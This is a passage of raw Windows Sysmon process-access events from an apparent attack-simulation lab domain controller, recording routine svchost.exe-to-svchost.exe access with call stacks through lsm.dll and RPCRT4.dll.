13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.336{59A5CD1D-93FB-6005-FE04-00000000A301}51084896C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 